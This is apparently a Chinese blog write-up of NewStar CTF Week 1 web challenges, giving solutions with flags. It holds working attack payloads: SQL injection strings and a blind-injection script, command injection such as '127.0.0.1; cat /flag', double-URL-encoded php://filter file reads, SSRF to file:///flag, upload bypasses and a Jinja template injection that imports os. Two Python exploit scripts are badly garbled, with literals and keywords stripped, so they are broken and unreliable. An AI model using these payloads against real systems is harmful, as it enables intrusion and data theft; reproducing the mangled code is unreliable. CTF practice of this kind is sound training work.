PHPNuct算法
NewStar CTF Web 题目解析与解题思路
Week 1 Multi-Headache3 **难度:简单** 使用 dirsearch 扫描目录: !image 找到 /robots.txt,访问: !image 访问 hidden.php: !image 翻译提示,按 F12 打开开发者工具捕获流量包,发现 flag: !image Strange_Login **难度:简单** 经典登录框,万能密码 admin' or 1=1 #: !…
Week 1 Multi-Headache3 **难度:简单** 使用 dirsearch 扫描目录: !image 找到 /robots.txt,访问: !image 访问 hidden.php: !image 翻译提示,按 F12 打开开发者工具捕获流量包,发现 flag: !image Strange_Login **难度:简单** 经典登录框,万能密码 admin' or 1=1 #: !…
难度:简单
使用 dirsearch 扫描目录:
找到 /robots.txt,访问:
访问 hidden.php:
翻译提示,按 F12 打开开发者工具捕获流量包,发现 flag:
flag{eb4580e7-21e4-4446-9dba-4fb51d9cf051}
难度:简单
经典登录框,万能密码 admin' or 1=1 #:
flag{26cbccab-3a76-46f9-a770-7e8cb0b10d96}
难度:简单
访问题目页面,习惯性使用 F12 或 Ctrl+U 无法查看源码,最后使用 Ctrl+Shift+I 打开开发者工具:
访问 s3kret.php:
<?php highlight_file(__FILE__);include"flag.php";if(isset($_POST['newstar2025'])){$answer=$_POST['newstar2025'];if(intval($answer)!=47&&intval($answer,0)==47){echo$flag;}else{echo"你还未参透奥秘";}}
审计后发现,要求 POST 输入 newstar2025 的值满足:
intval($answer) (默认按十进制)不是 47。intval($answer, 0) (自动判断进制)等于 47。输入 0x2F 即可满足:
flag{c0c8fc92-fd89-42e6-aa83-2b14c3e22bcf}
难度:中等
第一个挑战:抓包发现 count 字段为 1,修改为 1000000:
需要截取包然后修改发送,才能正常跳转。
第二关:看不懂,看提示,原来是需要 GET 传参 shipin,参数值为 mogubaozi:
这里 POST 要传入前文提到过的 guding:
这里需要使用 DELETE 方法传入 chongzi,截取改包:
成功:
访问 /Level2_END,第三关:与 HTTP 协议有关。根据提示,修改 UA 头,还需要升级版本。
访问 /Level4_Sly:
flag{9fef7934-2c71-4225-813d-849df714c8fa}
难度:中等
审计 JS 代码,为了绕过 JS 限制,在浏览器 Console 里运行:
document.getElementById('nextLevelForm').submit();
这会绕过所有按钮/遮罩限制,直接提交表单。
成功绕过,来到下一关,这一关提示弱口令,尝试了几个弱口令成功登入:admin/111111。
<?phperror_reporting(0);functiongenerate_dynamic_flag($secret){returngetenv("ICQ_FLAG")?:'default_flag';}if(isset($_GET['newstar'])){$input=$_GET['newstar'];if(is_array($input)){die("恭喜掌握新姿势");}if(preg_match('/[^\d*\/~()\s]/',$input)){die("老套路了,行不行啊");}if(preg_match('/^[\d\s]+$/',$input)){die("请输入有效的表达式");}$test=0;try{ @eval("\$test = $input;");}catch(Error$e){die("表达式错误");}if($test==2025){$flag=generate_dynamic_flag($flag_secret);echo"<div>拿下 flag!</div>";echo"<div><div>FLAG: {$flag}</div></div>";}else{echo"<div>大哥哥泥把数字算错了: ≠ 2025</div>";}}{ }
审计 PHP 代码:
0-9, *, /, ~, (, ), 空白。@eval("$test = $input;"),判断 $test == 2025。因为 45 * 45 = 2025,且 * 属于允许字符,所以 payload 为:newstar=45*45。
GET 传参即可:
flag{c6582a80-afdd-4ef9-8088-a15455bc30cf}
难度:简单
前端记分逻辑中,可以在控制台直接作弊:
score = 1000000;// 直接满足目标分数
endLevel();// 触发关卡结束逻辑
flag{8a6f2ab9-9b7e-4274-90bf-efbe94277b14}
难度:简单
ping 的命令执行,使用 ; 拼接:
127.0.0.1; ls
127.0.0.1; cat /flag
查看环境变量:
127.0.0.1; env
flag{9cacf6f4-5cc9-4cef-99a8-97c51b2953be}
难度:简单
开局一个登录框,尝试弱口令无果,Ctrl+U 查看源代码,发现提示:
<!-- 唔...这个密码有点难记,但是我已经记好了 Doro/Doro_nJlPVs_@123 -->
根据提示,抓包查看后端逻辑:
根据验证流程写 exp:
#!/usr/bin/env python3
# coding: utf-8
import requests
import re
import time
import sys
BASE = "https://eci-2ze6zyo0m8laq9swg77e.cloudeci1.ichunqiu.com:5000"
LOGIN_PATH = "/login"
START_PATH = "/start_challenge"
VERIFY_PATH = "/verify_token"
USERNAME = "Doro"
PASSWORD = "Doro_nJlPVs_%40123"
def login(session: requests.Session) -> bool:
url = BASE + LOGIN_PATH
session.headers.update({"Origin": BASE,"Referer": BASE + "/login","Content-Type":"application/x-www-form-urlencoded","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","Sec-Fetch-Site":"same-origin","Sec-Fetch-Mode":"navigate","Sec-Fetch-User":"?1","Sec-Fetch-Dest":"document",})
data = f"username={USERNAME}&password={PASSWORD}"
resp = session.post(url, data=data, allow_redirects=False)
print("[login] status:", resp.status_code)
print("[login] headers:", resp.headers)
if "Set-Cookie" in resp.headers resp.headers[] resp.headers[]:
(, resp.headers[])
(, resp.text[:])
():
url = BASE + START_PATH
resp = session.post(url)
(, resp.status_code)
:
data = resp.json()
Exception e:
(, e)
(, resp.text[:])
data
():
data data:
:
multiplier = (data.get()) data.get()
Exception:
multiplier =
xor_raw = data.get()
xor_value =
xor_raw :
:
(xor_raw, ) xor_raw.lower().startswith():
xor_value = (xor_raw, )
:
xor_value = (xor_raw)
:
xor_value =
expr = data.get(, )
expr expr:
tsource = (time.time())
:
m =
expr:
m = re.search(, expr)
m:
tsource = (m.group())
:
tsource = (time.time())
multiplier :
expr = data.get(, )
m2 = re.search(, expr)
m2:
multiplier = (m2.group())
multiplier xor_value :
ValueError(.(data))
token = (tsource * multiplier) ^ xor_value
token, {: tsource, : multiplier, : xor_value, : }
expr = data.get()
expr:
ValueError(.(data))
expr:
tsource = (time.time())
:
m_time = re.search(, expr)
m_time:
tsource = (m_time.group())
:
tsource = (time.time())
m_mul = re.search(, expr)
m_mul:
ValueError(.(expr))
multiplier = (m_mul.group())
m_xor = re.search(, expr)
m_xor:
ValueError(.(expr))
xor_raw = m_xor.group()
xor_value = (xor_raw, ) xor_raw.lower().startswith() (xor_raw)
token = (tsource * multiplier) ^ xor_value
token, {: tsource, : multiplier, : xor_value, : }
():
url = BASE + VERIFY_PATH
payload = {: token}
resp = session.post(url, json=payload, headers={:})
(, resp.status_code)
:
(, resp.json())
Exception:
(, resp.text[:])
resp
():
s = requests.Session()
s.headers.update({:,:,})
ok = login(s)
ok:
()
data = fetch_challenge(s)
data :
()
(, data)
:
token, info = parse_and_compute_token(data)
Exception e:
(, e)
(, token, , info, )
resp = submit_token(s, token)
__name__ == :
main()
flag{c596b46c-3c82-4416-9e70-538104015062}
难度:困难
文件上传漏洞,前端校验,抓包修改后缀名:
通过 /v1/onload 接口获取上传路径:
确定上传成功,但是不知道为何无法利用,只能上传执行 phpinfo() 试试:
成功解析:
复制为 html 文件:
flag{741a9681-2e6c-4486-b767-557e907c8863}
难度:困难
本题考查 SQL 注入过滤与报错注入:
防火墙过滤了空格,单引号,幸运的是其为数字型的报错注入:
使用 %0a 绕过空格:
发现没有 databases() 函数,猜测可能不是 MySQL 数据库,经过探测,确定是 SQLite:
这里是因为查询列数与显示不一样,所以报错,接下来探测列数:
确定是 5 列,构造:
-1 UNION select * FROM (SELECT 0) AS A CROSS JOIN (SELECT 2) AS B CROSS JOIN (SELECT 2) AS C CROSS JOIN (SELECT 3) AS D CROSS JOIN (SELECT 4) AS E
替换空格:
-1%0aUNION%0aselect%0a*%0aFROM(SELECT%0a0)%0aAS%0aA%0aCROSS%0aJOIN%0a(SELECT%0a2)%0aAS%0aB%0aCROSS%0aJOIN%0a(SELECT%0a2)%0aAS%0aC%0aCROSS%0aJOIN%0a(SELECT%0a3)%0aAS%0aD%0aCROSS%0aJOIN%0a(SELECT%a4)aASaE
查询数据库版本号:
-1%0aUNION%0aselect%0a*%0aFROM(SELECT%0a0)%0aAS%0aA%0aCROSS%0aJOIN%0a(SELECT%0a2)%0aAS%0aB%0aCROSS%0aJOIN%0a(SELECT%0asqlite_version())%0aAS%0aC%0aCROSS%0aJOIN%0a(SELECT%0a3)%0aAS%0aD%0aCROSS%0aJOIN%0a(SELECTa4)aASaE
查看表名和字段名:
-1%0aUNION%0aselect%0a*%0aFROM(SELECT%0a0)%0aAS%0aA%0aCROSS%0aJOIN%0a(SELECT%0a2)%0aAS%0aB%0aCROSS%0aJOIN%0a(SELECT%0asql%0afrom%0asqlite_master)%0aAS%0aC%0aCROSS%0aJOIN%0a(SELECT%0a3)%0aAS%0aD%0aCROSS%aJOINa(a4)aASaE
发现有一个 sys_config 表,表内的字段为:id, config_key, config_value。
使用 select * from user_data。因为这里 , 被 ban 了,* 的话无法输出,只能挨个查询具体的值,最后使用:
-1%0aUNION%0aselect%0a*%0aFROM(SELECT%0a0)%0aAS%0aA%0aCROSS%0aJOIN%0a(SELECT%0a2)%0aAS%0aB%0aCROSS%0aJOIN%0a(select%0aconfig_value%0afrom%0asys_config)%0aAS%0aC%0aCROSS%0aJOIN%0a(SELECT%0a3)%0aAS%0aD%0aCROSS%aJOINa(a4)aASaE
flag{1148f076-61cb-457a-818f-d910ef21b142}
难度:签到
访问拿到:
<?phphighlight_file(__FILE__);$cipher=$_POST['cipher']??'';functionatbash($text){$result='';foreach(str_split($text)as$char){if(ctype_alpha($char)){$is_upper=ctype_upper($char);$base=$is_upper?ord('A'):ord('a');$offset=ord(strtolower($char))-ord('a');$new_char=chr($base+(25-$offset));$result.=$new_char;}else{$result.=$char;}}return$result;}if($cipher){$cipher=base64_decode($cipher);$encoded=atbash($cipher);$encoded=str_replace(' ','',);=(); @();;}=;=;=...;....; 真的是签到吗? 真的很签到诶! 真的是签到吗? 真的很签到诶! 真的是签到吗? 真的很签到诶! 真的是签到吗? 真的很签到诶! 真的是签到吗? 真的很签到诶!
审计后发现,这是一个 Webshell 解码执行的题目,经过 Base64 → Atbash → 去空格 → ROT13 的代码,服务器最终会执行 (eval) 解码后的内容,所以构造我们的 payload:
cat /flag
cipher (Base64 输入) ↓ base64_decode ↓ Atbash (字母翻转) ↓ 去掉空格 ↓ str_rot13 ↓ eval()
dW91dGlhKCJrbXRcMDQwL2hibWciKTs=
flag{8b3bf25f-b724-4f06-9197-ba25bd749249}
难度:简单
<?phpheader('Content-Type: text/html; charset=utf-8');functionfilter($file){$waf=array('/',':','php','base64','data','zip','rar','filter','flag');foreach($wafas$waf_word){if(stripos($file,$waf_word)!==false){echo"waf:".$waf_word;returnfalse;}}returntrue;}functionfilter_output($data){$waf=array('f');foreach($wafas$waf_word){if(stripos($data,$waf_word)!==false){echo"waf:".$waf_word;returnfalse;}}while(true){$decoded=base64_decode($data,true);if($decoded===false||$decoded===$data){break;}$data=$decoded;}foreach($wafas){((,)!==){.;returnfalse;}}returntrue;}(([])){=[];(()!==){();}=();=();(()!==){();};}();
审计发现,漏洞点在 file_get_contents,可以使用伪协议进行任意文件读取,但是 WAF 限制了部分伪协议,并且要求读到的文件内容中不能带有 f 字样。
分析程序逻辑,首先读入 file 参数值:
if(isset($_GET['file'])){$file=$_GET['file'];if(filter($file)!==true){die();}$file=urldecode($file);$data=file_get_contents($file);if(filter_output($data)!==true){die();}echo$data;}
首先进入 filter 函数中:
functionfilter($file){$waf=array('/',':','php','base64','data','zip','rar','filter','flag');foreach($wafas$waf_word){if(stripos($file,$waf_word)!==false){echo"waf:".$waf_word;returnfalse;}}returntrue;}
这里会不分大小写,匹配这些字符,如果匹配,程序退出,绕过这里,只需要 URL 双重编码即可。
接下来经过一次 URL 解码,执行 file_get_contents() 后,进入 filter_output()。
functionfilter_output($data){$waf=array('f');foreach($wafas$waf_word){if(stripos($data,$waf_word)!==false){echo"waf:".$waf_word;returnfalse;}}while(true){$decoded=base64_decode($data,true);if($decoded===false||$decoded===$data){break;}$data=$decoded;}foreach($wafas$waf_word){if(stripos($data,$waf_word)!==false){echo"waf:".$waf_word;returnfalse;}}returntrue;}
它会对读取文件的内容进行判断,匹配是否存在 f,也不区分大小写。然后,如果是被 base64 编码过的内容,就会循环解码,直到不能解码为止。
所以我们的思路很明确,利用 URL 双重编码使用 php://filter 伪协议读取文件内容,然后对文件内容先进行 rot13 编码读取 flag。
Payload:
php://filter/string.rot13/resource=/flag
https://eci-2zeblwpcf451usd1p6ji.cloudeci1.ichunqiu.com:80/?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%252557256657453352657256557356657557256356553452656656356156
flag{8847b675-528e-4ee8-aab6-ff3a854b53bc}
难度:简单
访问题目,点了首歌,听起来不错,源码中发现异常:
原来是 SSRF,但是限制 http 协议:
扫描目录发现有 flag.php,但是直接访问是 403。
所以使用 SSRF 访问:
<?php$client_ip=$_SERVER['REMOTE_ADDR'];// 只允许本地访问if($client_ip!=='127.0.0.1'&&$client_ip!=='::1'){header('HTTP/1.1 403 Forbidden');echo"你是外地人,我只要\"本地\"人";exit;}highlight_file(__FILE__);if(isset($_GET['soyorin'])){$url=$_GET['soyorin'];echo"flag 在根目录";// 普通请求$ch=curl_init($url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,false);// 直接输出给浏览器curl_setopt($ch,CURLOPT_FOLLOWLOCATION,true);curl_setopt($ch,CURLOPT_BUFFERSIZE,8192);curl_exec($ch);curl_close($ch);exit;}?>
审计一下,发现可以利用前面可转发的 SSRF 来绕过本地访问,剩下的伪协议直接出:
https://eci-2ze30n5xe2nckmepbw6d.cloudeci1.ichunqiu.com:80/index.php?proxy=http://127.0.0.1/flag.php?soyorin=file:///flag
flag{a8fe31b5-aad7-4dc1-9bda-3e21daff103f}
难度:简单
静态页面,没啥好看的,直接开扫:
发现存在系统备份文件,访问下载:
可以直接访问 public,进入到登录页面,已经提醒无法爆破,只能另寻他法。
进入到 public 目录下,发现存在 .git 文件夹,想到可能是考的 Git 泄露。
git log
查看提交记录:
使用 git show --name-only commit 看到删除的提示:
git show -p
查看删除的文件内容:
好像没有,返回来审计 login.php,发现:
<?phprequire_once'user.php';$userData=getUserData();if($_SERVER['REQUEST_METHOD']==='POST'){$username=$_POST['username']??'';$password=$_POST['password']??'';if($username===$userData['username']&&$password===$userData['password']){header('Location: /secret-xxxxxxxxxxxxxxxxxxx');exit();}else{echo'登录失败,在 git 里找找吧';exit();}}
账号密码都在 user.php 中,所以需要从 Git 中恢复 user.php。
在 .git/logs/HEAD 文件中发现其中隐含一个测试的 branch,会被删除。
查看这个提交:
git ls-tree -r --name-only 353b98f7c2fe77a5a426bf73576f5113820c4669
使用 git show commit -b 查看文件内容:
用户名密码为:admin/f75cc3eb-21e0-4713-9c30-998a8edb13de。
进入之后提示 Mac,所以是 .DS_Store 文件泄露,直接在当前路径拼接下载并查看内容:
拼接中间的 ffffllllaaaagggg114514,拿到 flag:
flag{e08813e1-a595-464c-85c5-67b474f83601}
难度:中等
文件上传,并且支持上传的类型为:
后端进行类型及文件内容的校验,所以只能看允许的文件内有没有可以解析的,先绕过内容检测:
<?phpinfo();?>
对 <?php 有过滤,将允许的文件后缀挨个改包然后访问查看响应结果,发现 .webp 可以被解析:
flag{fd8af3ec-7983-4724-ad82-e3f84149346f}
难度:中等
from flask import Flask, jsonify, request, render_template_string, render_template
import sys, random
func_List = ["get_close_matches", "dedent", "fmean", "listdir", "search", "randint", "load", "sum", "findall", "mean", "choice"]
need_List = random.sample(func_List, 5)
need_List = dict.fromkeys(need_List, 0)
BoleanFlag = False
RealFlag = __import__("os").environ.get("ICQ_FLAG", "flag{test_flag}")
# 清除 ICQ_FLAG
__import__("os").environ["ICQ_FLAG"] = ""
def trace_calls(frame, event, arg):
if event == 'call':
func_name = frame.f_code.co_name
if func_name in need_List:
need_List[func_name] = 1
if all(need_List.values()):
global BoleanFlag
BoleanFlag = True
return trace_calls
app = Flask(__name__)
@app.route('/', methods=["GET", "POST"])
def index():
submit = request.form.get('submit')
if submit:
sys.settrace(trace_calls)
(render_template_string(submit))
sys.settrace()
BoleanFlag:
jsonify({: RealFlag})
jsonify({: })
render_template_string(, funcList=need_List, called_funcs=[func func, called need_List.items() called])
__name__ == :
app.run(host=, port=, debug=)
使用脚本辅助:
{%set __imp =''.__class__.__mro__[1].__subclasses__()[IDX].__init__.__globals__['__builtins__']['__import__']%}{%set _os = __imp('os')%}{%set _re = __imp('re')%}{%set _difflib = __imp('difflib')%}{%set _textwrap = __imp('textwrap')%}{%set _statistics = __imp('statistics')%}{%set _random = __imp('random')%}{%set _json = __imp('json')%}{%set _io = __imp('io')%}{# 通过 io.StringIO 提供一个可读的 JSON 文件对象,以便触发 json.load 的函数名 "load" #}{%set _f = _io.StringIO('"x"')%}{# 下面依次调用目标函数(尽量覆盖 need_List 里可能的名字) #}{%set a = _difflib.get_close_matches('a',['a'])%}{%set b = _textwrap.dedent(' x')%}{%set c = _statistics.fmean([1,2,3])%}{%set d = _os.listdir('.')%}{%set e = _re.search('a','a')%}{%set f = _random.randint(1,2)%}{%set g = _json.loads('"x"')%}{%set h = _json.load(_f)%}{%set i = _re.findall('.','a')%}{%set j = _statistics.mean([1,2])%}{%set k = _random.choice([1,2])%} Rendered.
flag{12c4c60d-6a52-4515-85a0-90052c4e6b2b}
难度:中等
盲注,通过字典 fuzz 之后发现,可以使用 () 来绕过对空格的过滤,这里给出自动化的脚本。
Exp:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import time
import sys
import argparse
# ---------------- 配置区(请按需修改) ----------------
URL = "https://eci-2ze67tlhfafcfkym7tjr.cloudeci1.ichunqiu.com:80/search"
HEADERS = {"Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (compatible)"}
PREFIX = "name=amiya'and("
SUFFIX = ")#"
TIMEOUT = 6
RETRIES = 2
SLEEP = 0.03
DEBUG = False
SPACE_BYPASS = False
SPACE_REPLACEMENT = "/**/"
# ----------------- HTTP 与判断函数 -----------------
def send_payload_raw(cond):
if SPACE_BYPASS:
cond = cond.replace(" ", SPACE_REPLACEMENT)
payload = f"{PREFIX}{cond}{SUFFIX}"
last_exc = None
for attempt in range(RETRIES + 1):
try:
if DEBUG:
print(f"[DBG] -> {payload}")
resp = requests.post(URL, data=payload, headers=HEADERS, timeout=TIMEOUT)
try:
return resp.json()
except Exception:
return resp.text
except requests.exceptions.RequestException e:
last_exc = e
DEBUG:
()
time.sleep()
DEBUG:
(, last_exc)
():
resp :
(resp, ):
status = (resp.get(, )).lower()
message = (resp.get(, )).lower()
status == message:
status == message:
txt = (resp)
txt:
txt:
DEBUG:
(, txt[:].replace(, ))
():
resp = send_payload_raw(cond)
is_true_response(resp)
():
DEBUG:
()
low =
high = max_upper
low < high:
mid = (low + high) //
cond =
DEBUG:
()
check_condition(cond):
low = mid +
:
high = mid
time.sleep(SLEEP)
length = low
DEBUG:
()
length
():
DEBUG:
()
result =
pos (, max_len + ):
null_cond =
check_condition(null_cond):
DEBUG:
()
low =
high =
low <= high:
mid = (low + high) //
cond =
check_condition(cond):
low = mid +
:
high = mid -
time.sleep(SLEEP)
ascii_val = low
ascii_val < ascii_val > :
DEBUG:
()
ch = (ascii_val)
result += ch
sys.stdout.write()
sys.stdout.flush()
()
result
():
length = binary_search_length(expr, max_len_guess)
length == :
[]
s = extract_string_by_binary(expr, length)
items = [x x s.split(sep) x != ]
items
():
expr =
extract_group_concat_list(expr, max_len_guess=, sep=)
():
expr =
extract_group_concat_list(expr, max_len_guess=, sep=)
():
expr =
extract_group_concat_list(expr, max_len_guess=, sep=)
():
columns :
cols = list_columns_for_table(schema_name, table_name)
cols:
DEBUG:
()
, []
:
cols = columns
concat_parts = []
i, c (cols):
concat_parts.append(c)
i != (cols) - :
concat_parts.append()
inner = .join(concat_parts)
expr =
length = binary_search_length(expr, max_len_guess)
length == :
, []
s = extract_string_by_binary(expr, length)
rows = []
s:
rows = [r r s.split() r != ]
s, rows
():
p = argparse.ArgumentParser(description=)
p.add_argument(, =, default=)
p.add_argument(, =, default=)
p.add_argument(, =, action=)
p.add_argument(, =, action=)
p.parse_args()
():
URL, DEBUG
args = parse_args()
args.url:
URL = args.url
args.debug:
DEBUG =
()
(, URL)
()
dbs = list_all_databases()
dbs:
()
()
i, db (dbs, ):
()
args.only_db:
target_schema = args.schema
()
tables = list_tables_for_schema(target_schema)
tables:
()
()
t tables:
()
cols = list_columns_for_table(target_schema, t)
cols:
()
()
()
raw, rows = dump_table_data(target_schema, t, columns=cols)
raw:
()
max_preview =
()
i, r (rows[:max_preview], ):
()
(rows) > max_preview:
()
()
__name__ == :
main()
flag{b2f00fa9-8d65-45ac-9193-8a852c4910fb}
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
使用加密算法(如AES、TripleDES、Rabbit或RC4)加密和解密文本明文。 在线工具,加密/解密文本在线工具,online
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML 转 Markdown 互为补充。 在线工具,Markdown 转 HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML 转 Markdown在线工具,online